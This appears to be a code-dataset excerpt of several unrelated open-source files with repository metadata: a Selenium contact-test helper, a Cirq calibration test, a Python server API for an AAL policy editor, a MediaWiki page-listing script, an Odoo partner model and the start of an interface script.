| false
| 3.603175
| false
| false
| false
|
pbrandebura/Task1
|
fixture/contact.py
|
1
|
4977
|
from model.contact import Contact
class ContactHelper:
def __init__(self, app):
self.app = app
def back_to_homepage(self):
wd = self.app.wd
if not len(wd.find_elements_by_name("Send e-Mail")) > 0:
wd.find_element_by_link_text("home").click()
def proceed_to_newuser_page(self):
wd = self.app.wd
if not (wd.current_url.endswith("/edit.php") and len(wd.find_elements_by_name("Enter")) > 0):
wd.find_element_by_link_text("add new").click()
def add_new_user(self, contact):
wd = self.app.wd
# add new contact
self.proceed_to_newuser_page()
# enter details
self.entering_details(contact)
# submit
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.back_to_homepage()
self.contact_cache = None
def select_contact_by_index(self, index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def edit_first_user(self):
wd = self.app.wd
self.edit_user_by_index(0)
def edit_user_by_index(self, index, contact):
wd = self.app.wd
self.back_to_homepage()
# edit exisitng contact
self.select_contact_by_index(index)
wd.find_element_by_xpath("//*[@id='maintable']/tbody/tr["+str(index+2)+"]/td[8]/a/img").click()
# enter details
self.entering_details(contact)
# submit
wd.find_element_by_name("update").click()
self.back_to_homepage()
self.contact_cache = None
def delete_first_contact(self):
self.delete_contact_by_index(0)
def delete_contact_by_index(self, index):
wd = self.app.wd
self.select_contact_by_index(index)
wd.find_element_by_xpath("//*[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def entering_details(self, contact):
wd = self.app.wd
self.type("firstname", contact.firstname)
self.type("middlename", contact.middlename)
self.type("lastname", contact.lastname)
self.type("nickname", contact.nickname)
self.type("title", contact.usertitle)
self.type("company", contact.company)
self.type("address", contact.userAddress)
self.type("home", contact.homeNumber)
self.type("mobile", contact.mobileNumber)
self.type("work", contact.workNumber)
self.type("fax", contact.faxNumber)
self.type("email", contact.userEmail)
self.type("email2", contact.userEmail2)
self.type("email3", contact.userEmail3)
self.type("homepage", contact.userHomepage)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[%s]" % contact.bday).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[%s]" % contact.bday).click()
if not wd.find_element_by_xpath(
"//div[@id='content']/form/select[2]//option[%s]" % contact.bmonth).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[%s]" % contact.bmonth).click()
self.type("byear", contact.byear)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[%s]" % contact.aday).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[%s]" % contact.aday).click()
if not wd.find_element_by_xpath(
"//div[@id='content']/form/select[4]//option[%s]" % contact.amonth).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[%s]" % contact.amonth).click()
self.type("ayear", contact.ayear)
self.type("address2", contact.userAddress2)
self.type("phone2", contact.userPhone2)
self.type("notes", contact.userNotes)
def type(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def count(self):
wd = self.app.wd
self.back_to_homepage()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.back_to_homepage()
self.contact_cache = []
for element in wd.find_elements_by_name("entry"):
cells = element.find_elements_by_tag_name("td")
last_name = cells[1].text
first_name = cells[2].text
id = element.find_element_by_name("selected[]").get_attribute("value")
self.contact_cache.append(Contact(firstname=first_name, lastname=last_name, id=id))
return list(self.contact_cache)
|
apache-2.0
| 7,543,241,541,158,560,000
| 40.831933
| 120
| 0.593731
| false
| 3.446676
| false
| false
| false
|
quantumlib/Cirq
|
cirq-google/cirq_google/calibration/xeb_wrapper_test.py
|
1
|
4677
|
# Copyright 2021 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing.pool
import numpy as np
import pandas as pd
import pytest
import scipy.optimize
import scipy.optimize._minimize
import cirq
import cirq_google as cg
from cirq.experiments import random_rotations_between_grid_interaction_layers_circuit
from cirq.experiments.xeb_fitting import XEBPhasedFSimCharacterizationOptions
from cirq_google.calibration.phased_fsim import (
LocalXEBPhasedFSimCalibrationOptions,
LocalXEBPhasedFSimCalibrationRequest,
)
from cirq_google.calibration.xeb_wrapper import (
run_local_xeb_calibration,
_maybe_multiprocessing_pool,
)
SQRT_ISWAP = cirq.ISWAP ** -0.5
def _minimize_patch(
fun,
x0,
args=(),
method=None,
jac=None,
hess=None,
hessp=None,
bounds=None,
constraints=(),
tol=None,
callback=None,
options=None,
x0_should_be=None,
):
assert method == 'nelder-mead'
np.testing.assert_allclose(x0_should_be, x0)
return scipy.optimize.OptimizeResult(
fun=0,
nit=0,
nfev=0,
status=0,
success=True,
message='monkeypatched',
x=x0.copy(),
final_simplex=None,
)
def _benchmark_patch(*args, **kwargs):
return pd.DataFrame()
@pytest.mark.parametrize(
['fsim_options', 'x0_should_be'],
[
(
XEBPhasedFSimCharacterizationOptions(
characterize_zeta=True,
characterize_gamma=True,
characterize_chi=True,
characterize_theta=False,
characterize_phi=False,
),
[0.0, 0.0, 0.0],
),
(XEBPhasedFSimCharacterizationOptions(), [np.pi / 4, 0.0, 0.0, 0.0, 0.0]),
(
XEBPhasedFSimCharacterizationOptions(
characterize_zeta=True,
characterize_chi=True,
characterize_gamma=True,
characterize_theta=False,
characterize_phi=False,
theta_default=99,
zeta_default=0.1,
chi_default=0.2,
gamma_default=0.3,
phi_default=99,
),
[0.1, 0.2, 0.3],
),
],
)
def test_run_calibration(monkeypatch, fsim_options, x0_should_be):
def _minimize_patch_2(*args, **kwargs):
return _minimize_patch(*args, **kwargs, x0_should_be=x0_should_be)
monkeypatch.setattr('cirq.experiments.xeb_fitting.scipy.optimize.minimize', _minimize_patch_2)
monkeypatch.setattr(
'cirq_google.calibration.xeb_wrapper.xebf.benchmark_2q_xeb_fidelities', _benchmark_patch
)
qubit_indices = [
(0, 5),
(0, 6),
(1, 6),
(2, 6),
]
qubits = [cirq.GridQubit(*idx) for idx in qubit_indices]
sampler = cirq.ZerosSampler()
circuits = [
random_rotations_between_grid_interaction_layers_circuit(
qubits,
depth=depth,
two_qubit_op_factory=lambda a, b, _: SQRT_ISWAP.on(a, b),
pattern=cirq.experiments.GRID_ALIGNED_PATTERN,
seed=10,
)
for depth in [5, 10]
]
options = LocalXEBPhasedFSimCalibrationOptions(
fsim_options=fsim_options,
n_processes=1,
)
characterization_requests = []
for circuit in circuits:
_, characterization_requests = cg.prepare_characterization_for_moments(
circuit, options=options, initial=characterization_requests
)
assert len(characterization_requests) == 2
for cr in characterization_requests:
assert isinstance(cr, LocalXEBPhasedFSimCalibrationRequest)
characterizations = [
run_local_xeb_calibration(request, sampler) for request in characterization_requests
]
final_params = dict()
for c in characterizations:
final_params.update(c.parameters)
assert len(final_params) == 3 # pairs
def test_maybe_pool():
with _maybe_multiprocessing_pool(1) as pool:
assert pool is None
with _maybe_multiprocessing_pool(2) as pool:
assert isinstance(pool, multiprocessing.pool.Pool)
|
apache-2.0
| -5,539,152,799,729,527,000
| 28.049689
| 98
| 0.633526
| false
| 3.556654
| false
| false
| false
|
hkff/AccLab
|
pyAAL/ui/api.py
|
1
|
22847
|
"""
Server API
Copyright (C) 2014 Walid Benghabrit
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from threading import Thread
from time import sleep
try:
from fodtlmon.fodtl.fodtlmon import *
except:
pass
__author__ = 'walid'
import os
from urllib.parse import *
import sys, shutil
from io import StringIO
from aalc import *
from AALtoAccmon import *
import json
base_dir = "examples"
ALLOWED_CMD = ["tspass", "aalc.py", "fotl-translate", "manage.py"]
# Filter ps
def is_cmd_allowed(cmds):
for x in ALLOWED_CMD:
if x in cmds:
return True
return False
# List dir
def api_list_dir(wpath):
tmp = "["
dirs = sorted(os.listdir(wpath)[::-1])
for d in dirs:
if d.startswith("."):
continue
tmp += '{' + '"id":"' + wpath+'/'+d + '", "text":"' + d + '"," iconCls":""'
if os.path.isdir(wpath + "/" + d):
tmp += ',"children": '
tmp += api_list_dir(wpath + '/' + d)
tmp += '},'
if tmp[-1] == ",":
tmp = tmp[:-1]
tmp += ']'
return tmp
# Read file
def api_read_file(f):
with open(base_dir + "/" + f) as fd:
return fd.read()
# Get template
def api_get_template(f):
with open(f) as fd:
return fd.read()
# Write file
def api_write_file(f, d):
res = -1
creation = False
# Add \n at the end
if d[-1] != "\n":
d += "\n"
if not os.path.isfile(base_dir + "/" + f):
creation = True
with open(base_dir + "/" + f, "w+") as fd:
res = str(fd.write(d))
check_aal_acd(f)
if creation:
Popen(['svn', "add", base_dir + "/" + f]).wait()
Popen(['svn', "commit", base_dir + "/", "-m", "'Add file %s'" % f]).wait()
else:
Popen(['svn', "commit", base_dir + "/", "-m", "'Edit file %s'" % f]).wait()
return res
# Rename file
def api_rename_file(f, new_name):
# TODO svn
os.rename(base_dir + "/" + f, base_dir + "/" + new_name)
return "RENAMED"
# Delete file
def api_delete_file(f):
file = base_dir + "/" + f
if os.path.isfile(file):
os.remove(file)
Popen(['svn', "del", file]).wait()
Popen(['svn', "commit", base_dir + "/", "-m", "'Delete file %s'" % f]).wait()
elif os.path.isdir(file):
shutil.rmtree(file)
Popen(['svn', "del", file]).wait()
Popen(['svn', "commit", base_dir + "/", "-m", "'Delete folder %s'" % f]).wait()
return "DELETED"
# Save preferences
def api_save_prefs(d):
# Add \n at the end
if d[-1] != "\n":
d += "\n"
with open("ui/prefs.json", "w+") as fd:
return str(fd.write(d))
# Load preferences
def api_load_prefs():
if not os.path.isfile("ui/prefs.json"):
api_save_prefs('{"theme": "monokai", "username": "", "fontSize": 14, "recentFiles": [] }')
with open("ui/prefs.json") as fd:
return fd.read()
# Create Folder
def api_create_folder(d):
if not os.path.exists(base_dir + "/" + d):
res = str(os.makedirs(base_dir + "/" + d))
Popen(['svn', "add", base_dir + "/" + d]).wait()
Popen(['svn', "commit", base_dir + "/", "-m", "'Add folder %s'" % d]).wait()
return res
else:
return "Directory exists !"
# Convert terminal colors to colored div
def to_html_colors(html_code: str):
html_code = html_code.replace("[91m[ERROR]", "<b style='color:red;'><span class='fa fa-times-circle' "
"style='padding-top: 2px;padding-right: 5px;'/>[ERROR]")
html_code = html_code.replace("[93m[WARNING]", "<b style='color:orange;'><span class='fa fa-exclamation-triangle'"
" style='padding-top: 2px;padding-right: 5px;'/>[WARNING]")
html_code = html_code.replace("[95mat line", "<b style='color:magenta; text-decoration: underline; "
"cursor: pointer;' class='aceLine'>at line")
html_code = html_code.replace("[91m", "<b style='color:red;'><span class='' style='padding-top: 2px;'/>")
html_code = html_code.replace("[93m", "<b style='color:orange;'><span class='' style='padding-top: 2px;'/>")
html_code = html_code.replace("[92m", "<b style='color:green;'><span class='fa fa-exclamation-triangles' "
"style='padding-top: 2px;'/>")
html_code = html_code.replace("[95m", "<b style='color:magenta;'><span class='fa fa-exclamation-triangles' "
"style='padding-top: 2px;'/>")
html_code = html_code.replace("[94m", "<b style='color:blue;'><span class='' style='padding-top: 2px;'/>")
html_code = html_code.replace("[39m", "</b>")
html_code = html_code.replace("<<", "<<")
html_code = html_code.replace(">>", ">>")
return html_code
# Compile AAL
def api_compile_aal(f):
# Save current context
sysout = sys.stdout
syserr = sys.stderr
# Capture the output
reportSIO = StringIO()
reportEIO = StringIO()
sys.stdout = reportSIO
sys.stderr = reportEIO
res = ""
try:
aalc(base_dir + "/" + f, libs_path="libs/aal/", root_path="", web=True)
except Exception as e:
res = "Compilation Error : " + str(e)
res = reportSIO.getvalue() + "\n" + reportEIO.getvalue()
# Restore context
sys.stdout = sysout
sys.stderr = syserr
print(res)
res = to_html_colors(res)
return res.replace("\n", "<br>")
# Compile tspass
def api_compile_tspass(f):
# Save current context
sysout = sys.stdout
syserr = sys.stderr
# Capture the output
reportSIO = StringIO()
reportEIO = StringIO()
sys.stdout = reportSIO
sys.stderr = reportEIO
try:
res = tspassc(file=base_dir + "/" + f, output="tmp.tspass")["print"]
except Exception as e:
res = "Compilation Error : " + str(e)
res += "\n" + reportSIO.getvalue() + "\n" + reportEIO.getvalue()
print(res)
# Restore context
sys.stdout = sysout
sys.stderr = syserr
return res.replace("\n", "<br>")
# Compile ACD
def api_compile_acd(aal, spec):
result = {"compliance": [], "sat": [], "error": ""}
tmp_file = "_tmp0001_.aal"
res = ""
try:
# Save current context
sysout = sys.stdout
syserr = sys.stderr
# Capture the output
reportSIO = StringIO()
reportEIO = StringIO()
sys.stdout = reportSIO
sys.stderr = reportEIO
api_write_file(tmp_file, aal)
res = aalc(base_dir + "/" + tmp_file, libs_path="libs/aal/", root_path="", web=False)
# Handling Sat
for c in res["mm"].aalprog.clauses:
clause = str(c.name)
tmp = validate2(res["mm"], "(always (" + c.usage.to_ltl() + "))", check=True)
result["sat"].append({clause: tmp["sat"]})
# Handling Compliance
specs = spec.split(";")
for x in specs:
x = x.strip()
sp = x.split("->")
if len(sp) == 2:
_c1 = res["mm"].clause(sp[0].strip())
_c2 = res["mm"].clause(sp[1].strip())
tmp = validate(res["mm"], _c1, _c2, resolve=False, verbose=False, use_always=False, acc_formula=0, chk='neg')
result["compliance"].append({x: tmp["ok"]})
res = reportSIO.getvalue() + "\n" + reportEIO.getvalue()
# Restore context
sys.stdout = sysout
sys.stderr = syserr
except Exception as e:
result["error"] += "\nCompilation Error : " + str(e) + "\n"
finally:
result["error"] += res
result["error"] = to_html_colors(result["error"].replace("\n", "</br>"))
api_delete_file(tmp_file)
return json.dumps(result)
# Get AAL declaration in JSON format
def api_get_aal_dec(f):
try:
mm = aalc(base_dir + "/" + f, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
except:
# Compilation Error
return '{"agents" : [], "services" : [], "types" : [], "data" : [], "clauses" : [], "dataTypes" : [], "actorTypes" : []}'
agents = ",".join(mm.get_declared(dtype="agents"))
services = ",".join(mm.get_declared(dtype="services"))
data = ",".join(mm.get_declared(dtype="data"))
tts = mm.aalprog.get_declared(m_type)
types = ",".join(mm.get_declared(dtype="types"))
# Filter by data type / actor type
actorTypes = ",".join(['"' + str(x.name) + '"' for x in list(filter(lambda x: x.subtype_of("Actor"), tts))])
dataTypes = ",".join(['"' + str(x.name) + '"' for x in list(filter(lambda x: x.subtype_of("data"), tts))])
clauses = ",".join(['"' + str(x.name) + '"' for x in mm.aalprog.clauses])
res = '{"agents" : [' + agents + '], "services" : [' + services + '], "types" : [' + \
types + '], "data" : [' + data + '], "clauses" : [' + clauses + ']' + ', "dataTypes" : [' +\
dataTypes + ']' + ', "actorTypes" : [' + actorTypes + ']' + '}'
return res
# Get ps info
def api_monitor():
# ps -a -o user,pid,%cpu,%mem,start,time,command
p = Popen(['ps', '-aL', '-o', 'user,pid,%cpu,%mem,time,command'], stdout=PIPE, stderr=PIPE, stdin=PIPE)
sts = p.stdout.read().decode("utf-8")
sts = sts.split("\n")
sts2 = [' '.join(x.split()) for x in sts][1:]
pss = ""
for x in sts2:
x = x.split(" ")
if len(x) >= 5:
cmd = ' '.join(x[5:])
if is_cmd_allowed(cmd):
pss += (
"{"
" \"user\": \"" + x[0] + "\","
" \"pid\" : \"" + x[1] + "\","
" \"cpu\" : \"" + x[2] + "\","
" \"mem\" : \"" + x[3] + "\","
" \"time\": \"" + x[4] + "\","
" \"cmd\" : \"" + cmd + "\" "
"},"
)
pss = pss[:-1]
json = "{\"ps\" : [ " + pss + " ]}"
return json
# kill process by id
def api_kill_ps(pid):
p = Popen(['kill', '-KILL', pid], stdout=PIPE, stderr=PIPE, stdin=PIPE)
return p.stdout.read().decode("utf-8")
# Macro API
def api_macro_call(f, macro_name, macro_args):
res = ""
try:
res = aalc(base_dir + "/" + f, libs_path="libs/aal/", root_path="", web=True)
# Save current context
sysout = sys.stdout
syserr = sys.stderr
# Capture the output
reportSIO = StringIO()
reportEIO = StringIO()
sys.stdout = reportSIO
sys.stderr = reportEIO
res["mm"].call(macro_name, macro_args[1:-1].split(','))
res = reportSIO.getvalue() + "\n" + reportEIO.getvalue()
# Restore context
sys.stdout = sysout
sys.stderr = syserr
except Exception as e:
res = "Compilation Error : " + str(e)
print(res)
res = to_html_colors(res)
return res.replace("\n", "<br>")
# Gen accmon
def api_gen_accmon(file, spec):
try:
mspec = MappingSpec()
tmp = spec.split(";")
for x in tmp:
tmp2 = x.split(":")
if len(tmp2) > 1:
args = tmp2[1].split("=>")
if tmp2[0] == "clause":
if len(args) > 2:
mspec.clauses.append(MappingSpec.ClauseMap(args[0], args[1], args[2]))
elif tmp2[0] == "service":
if len(args) > 1:
mspec.services.append(MappingSpec.ServiceMap(args[0], args[1]))
elif tmp2[0] == "agent":
if len(args) > 1:
mspec.agents.append(MappingSpec.AgentMap(args[0], args[1]))
elif tmp2[0] == "type":
if len(args) > 1:
mspec.types.append(MappingSpec.TypeMap(args[0], args[1]))
mm = aalc(base_dir + "/" + file, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
res = AALtoDJFODTLMON(mm, mspec)
file_name = file.replace('.aal', '_rules.py')
api_write_file(file_name, res)
return file_name
except:
# Compilation Error
return 'Error'
# Generate django app skeleton
def api_generate_django(aal_file, spec_file, output_folder):
return generate_django_skeleton(aal_file, spec_file, output_folder)
# Run django app
def api_run_django(app, port=9000):
p = Popen(['python3', base_dir + "/"+app, 'migrate'], stdout=PIPE, stderr=PIPE, stdin=PIPE)
# p = Popen(['python3', base_dir + "/"+app, 'runserver', str(port)], stdout=PIPE, stderr=PIPE, stdin=PIPE)
# IMPORTANT: Run the server using non blocking IO in order to capture errors and show them to the client
from queue import Queue, Empty
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, err, queue):
for line in iter(out.readline, b''):
queue.put(line.decode("utf-8"))
out.close()
for line in iter(err.readline, b''):
queue.put(line.decode("utf-8"))
err.close()
p = Popen(['python3', base_dir + "/"+app, 'runserver', str(port)], stdout=PIPE, stderr=PIPE, stdin=PIPE,
bufsize=1, close_fds=ON_POSIX)
q = Queue()
t = Thread(target=enqueue_output, args=(p.stdout, p.stderr, q))
t.daemon = True
t.start()
# Wait to get some data
sleep(5)
# Get output
items = []
max = 100
for numOfItemsRetrieved in range(0, max):
try:
if numOfItemsRetrieved == max:
break
items.append(q.get_nowait())
except Exception:
break
print("=====================================")
print("".join(items))
print("=====================================")
return "".join(items).replace("\n", "<br>")
# Convert Fodtl formula to vFodtl diagram
def api_fodtl_to_vfodtl(formula):
print(formula)
try:
from fodtlmon.parser.Parser import FodtlParser
except:
return "fodtlmon is not installed !"
try:
def prg(formula):
res = ""
js_class = "Fodtl_%s" % formula.__class__.__name__.lower()
if isinstance(formula, Predicate):
arguments = []
for x in formula.args:
arguments.append(prg(x))
res = '{ "%s": [%s] }' % (js_class, ",".join(arguments))
elif isinstance(formula, Constant):
res = '{ "%s": {"Fodtl_value": "%s"} }' % (js_class, formula.name)
elif isinstance(formula, Variable):
res = '{ "%s": {"Fodtl_value": "%s"} }' % (js_class, formula.name)
elif isinstance(formula, At):
pass
elif isinstance(formula, Forall):
pass
elif isinstance(formula, Exists):
pass
elif isinstance(formula, true) or isinstance(formula, false):
res = '{ "%s": "" }' % js_class
elif isinstance(formula, UExp):
inner = prg(formula.inner)
res = '{"%s" : %s}' % (js_class, inner)
elif isinstance(formula, BExp):
exp1 = prg(formula.left)
exp2 = prg(formula.right)
res = '{ "%s" : [%s, %s] }' % (js_class, exp1, exp2)
else:
raise Exception("Error %s of type %s" % (formula, type(formula)))
return res
f = FodtlParser.parse(formula)
res = prg(f)
return res
except Exception as e:
return "%s" % e
# Register formula in accmon
def api_register_accmon_monitor(formula, mon_name, accmon_url):
import urllib.request, urllib.parse
res = "Error"
values = {'formula_id': mon_name, 'formula': formula}
data = urllib.parse.urlencode(values)
data = data.encode('ascii') # data should be bytes
url = accmon_url + "/sysmon/remote/register_formula/"
with urllib.request.urlopen(url, data) as response:
res = str(response.read())
print(res)
return res
# Transform a clause into Fodtl formula
def api_clause_to_fodtl(file, clause):
res = "Error"
mm = aalc(base_dir + "/" + file, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
if mm is not None:
c = mm.clause(clause)
if c is not None:
res = aal_clause_to_fodtl(c)
return res
# Check and update the corresponding acd/aal file
def check_aal_acd(file):
def get_clause_node_from_json(acd, clause):
for x in acd:
if x["type"] == "PolicyUI":
c_name = re.search(r'CLAUSE \w+', x["policy"]).group(0).replace("CLAUSE ", "")
if c_name == clause:
return x
return None
ext = file.split(".")[-1]
if ext == "acd":
# Check acd file
aal_file_name = base_dir+"/"+file.replace(".acd", ".aal")
acd_file_name = base_dir+"/"+file
if os.path.isfile(aal_file_name): # The corresponding aal file exists
acd_file = ""
aal_file = ""
# Read acd and aal files
with open(acd_file_name, "r") as f:
acd_file = json.loads(f.read())
with open(aal_file_name, "r") as f:
aal_file = f.read()
mm = aalc(aal_file_name, libs_path="libs/aal/", root_path="", no_exec=True, web=False)["mm"]
if mm is not None:
inputfile = FileStream(aal_file_name)
# Update aal file
for x in acd_file:
if x["type"] == "PolicyUI":
clause_name = re.search(r'CLAUSE \w+', x["policy"]).group(0)
if clause_name not in aal_file: # Add the clause in the aal file
aal_file += "\n" + x["policy"]
else: # Update the clause
cl = mm.clause(clause_name.replace("CLAUSE ", ""))
if cl is not None:
rng = cl.source_range
original_clause = inputfile.getText(rng[0], rng[1])
if x["policy"] != original_clause:
aal_file = aal_file.replace(original_clause, x["policy"])
# TODO remove deleted clause
# Save aal file
with open(aal_file_name, "w") as f:
f.write(aal_file)
elif ext == "aal":
# Check aal file
aal_file_name = base_dir+"/"+file
acd_file_name = base_dir+"/"+file.replace(".aal", ".acd")
if os.path.isfile(acd_file_name): # The corresponding acd file exists
acd_file = ""
aal_file = ""
# Read acd and aal files
with open(acd_file_name, "r") as f:
acd_file = json.loads(f.read())
with open(aal_file_name, "r") as f:
aal_file = f.read()
mm = aalc(aal_file_name, libs_path="libs/aal/", root_path="", no_exec=True, web=False)["mm"]
if mm is not None:
inputfile = FileStream(aal_file_name)
# Update acd file
for x in mm.aalprog.clauses:
c = get_clause_node_from_json(acd_file, str(x.name))
if c is not None:
rng = x.source_range
original_clause = inputfile.getText(rng[0], rng[1])
if c["policy"] != original_clause:
c["policy"] = original_clause
# Save acd file
with open(acd_file_name, "w") as f:
json.dump(acd_file, f)
# SVN
def svn_init():
if not os.path.isdir(".workspace"):
print(" - Creating svn repo at .workspace")
p = Popen(['svnadmin', "create", ".workspace"])
p.wait()
svn_path = "file://%s" % os.path.realpath(__file__).replace("ui/api.py", ".workspace")
p = Popen(['svn', "import", base_dir + "/", svn_path, "-m", "'Initial commit'"])
p.wait()
p = Popen(['svn', "checkout", "--force", svn_path, base_dir + "/"])
p.wait()
# Svn log
def svn_log(target):
p = Popen(['svn', "up", base_dir + "/"])
p.wait()
p = Popen(['svn', "log", base_dir + "/" + target, "--xml"], stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.wait()
log = p.stdout.read().decode("utf-8")
return log
# Svn revert
def svn_revert(target, version):
p = Popen(['svn', "merge", "-r", "HEAD:%s" % version, "%s" % target], cwd=base_dir+'/')
p.wait()
p = Popen(['svn', "commit", "-m", "Rolled back to r%s" % version, "%s/%s" % (base_dir, target)], stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.wait()
log = p.stdout.read().decode("utf-8")
return log
# Svn diff
def svn_diff(target, r1, r2):
print("%s %s" % (r1, r2))
try:
r1 = int(r1)
r2 = int(r2)
except:
r1 = 1
r2 = 1
r1 = r1 if r1 >= 1 else 1
r2 = r2 if r2 >= 1 else 1
# p = Popen(['svn', "up", base_dir + "/"])
# p.wait()
p = Popen(['svn', "diff", base_dir + "/" + target, "-r", "%s:%s" %(r1, r2)], stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.wait()
log = p.stdout.read().decode("utf-8").replace("\n", "<br>")
return log
# Fodtlmon web service
def start_fodtlmon_server(server_port=9999):
import os
from subprocess import Popen
Popen(['python3', 'ui/mon.py', server_port])
sleep(1)
return server_port
# Translate AAL clause to FODTL
def aal_to_fodtl(file, clause):
res = "Error"
mm = aalc(base_dir + "/" + file, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
if mm is not None:
c = mm.clause(clause)
if c is not None:
res = aal_clause_to_fodtl(c)
return res
# Get AAL behaviors
def get_aal_behaviors(file):
from simul.SimulGenerator import m_behavior_to_behavior
import json
res = []
mm = aalc(base_dir + "/" + file, libs_path="libs/aal/", root_path="", no_exec=True, web=True)["mm"]
if mm is not None:
behaviors = mm.aalprog.get_behaviors()
for b in behaviors:
res.append(json.dumps(m_behavior_to_behavior(b, b.name).to_json()))
return json.dumps(res)
|
gpl-3.0
| 3,545,888,401,039,262,700
| 31.777618
| 138
| 0.521404
| false
| 3.387604
| false
| false
| false
|
remiscarlet/RandomKCWikiScripts
|
kcwiki-web/kcwiki/Python Scripts/mw-scripts/mediawikinuker.py
|
1
|
1857
|
# -*- coding: UTF-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import requests
import re
import os
from lxml import etree
fileLoc = os.path.join("/","Users","YutoTakamoto","Dropbox","YutoProgramming","python","pagesToNuke.txt")
baseURL = "http://en.kancollewiki.net/api.php?"
searchSize = 50
searchParams = ["@comment"]
searchProps = ["timestamp","wordcount","size"]
nameSpaces = ["1","201","203"]
wordSizeLimit = 1000
totalHits = 0
reason = "Deleting clutter."
params = {
"action":"query",
"list":"search",
"srsearch":"+".join(searchParams),
"srprop":"|".join(searchProps),
"srnamespace":"|".join(nameSpaces),
"srlimit":str(searchSize),
"sroffset":"0",
"format":"xml"
}
class HitsParser(object):
def start(self, tag, attrib):
if (tag == "searchinfo"):
self.totalHits = attrib["totalhits"]
def close(self):
pass
class Parser(object):
def start(self, tag, attrib):
if (tag == "p"):
if attrib["size"].isdigit() and attrib["wordcount"].isdigit():
if int(attrib["wordcount"])<wordSizeLimit:
# pass
self.file.write(attrib["title"]+"|"+self.reason+"\n")
#print attrib
def close(self):
pass
url = baseURL
for param,val in params.items():
url+="&"+param+"="+val
request = requests.get(url)
f = open(fileLoc,"w")
hitParser = etree.XMLParser(target = HitsParser())
result = etree.XML(request.text,hitParser)
totalHits = int(hitParser.target.totalHits)
print totalHits
parser = etree.XMLParser(target = Parser())
parser.target.file = f
parser.target.reason = reason
etree.XML(request.text,parser)
totalHits = totalHits if totalHits<5000 else 5000
for offset in xrange(0,totalHits,searchSize):
#break
params["sroffset"] = str(offset)
url = baseURL
for param,val in params.items():
url+="&"+param+"="+val
print url
req = requests.get(url)
etree.XML(req.text,parser)
parser.target.file.close()
|
gpl-2.0
| -545,714,957,443,156,200
| 23.434211
| 105
| 0.690361
| false
| 2.906103
| false
| false
| false
|
t3dev/odoo
|
addons/website/models/res_partner.py
|
1
|
2246
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import werkzeug
from odoo import api, models
def urlplus(url, params):
return werkzeug.Href(url)(params or None)
class Partner(models.Model):
_name = 'res.partner'
_inherit = ['res.partner', 'website.published.multi.mixin']
@api.multi
def google_map_img(self, zoom=8, width=298, height=298):
google_maps_api_key = self.env['website'].get_current_website().google_maps_api_key
if not google_maps_api_key:
return False
params = {
'center': '%s, %s %s, %s' % (self.street or '', self.city or '', self.zip or '', self.country_id and self.country_id.display_name or ''),
'size': "%sx%s" % (width, height),
'zoom': zoom,
'sensor': 'false',
'key': google_maps_api_key,
}
return urlplus('//maps.googleapis.com/maps/api/staticmap', params)
@api.multi
def google_map_link(self, zoom=10):
params = {
'q': '%s, %s %s, %s' % (self.street or '', self.city or '', self.zip or '', self.country_id and self.country_id.display_name or ''),
'z': zoom,
}
return urlplus('https://maps.google.com/maps', params)
@api.multi
def _get_name(self):
name = super(Partner, self)._get_name()
if self._context.get('display_website') and self.env.user.has_group('website.group_multi_website'):
if self.website_id:
name += ' [%s]' % self.website_id.name
return name
def _compute_display_name(self):
self2 = self.with_context(display_website=False)
super(Partner, self2)._compute_display_name()
# onchange uses the cache to retrieve value, we need to copy computed_value into the initial env
for record, record2 in zip(self, self2):
record.display_name = record2.display_name
@api.multi
def get_base_url(self):
"""When using multi-website, we want the user to be redirected to the
most appropriate website if possible."""
res = super(Partner, self).get_base_url()
return self.website_id and self.website_id._get_http_domain() or res
|
gpl-3.0
| -4,205,987,540,885,179,000
| 36.433333
| 149
| 0.600178
| false
| 3.587859
| false
| false
| false
|
Sirs0ri/PersonalAssistant_Interfaces
|
interface/__main__.py
|
1
|
4508
|
"""Starts the main interface. To be called with 'python interface'
from the root folder. After importing it, the interface will be
started start"""
import logging
import logging.handlers
import Queue
import socket
import sys
from autobahn.twisted.websocket import WebSocketClientProtocol, \
WebSocketClientFactory
from twisted.internet import reactor
import logger
import basic_interface as interface
# if "--localhost" in sys.argv or "-L" in sys.argv:
# IP = "127.0.0.1"
# else:
# IP = "192.168.178.46"
logger.initialize()
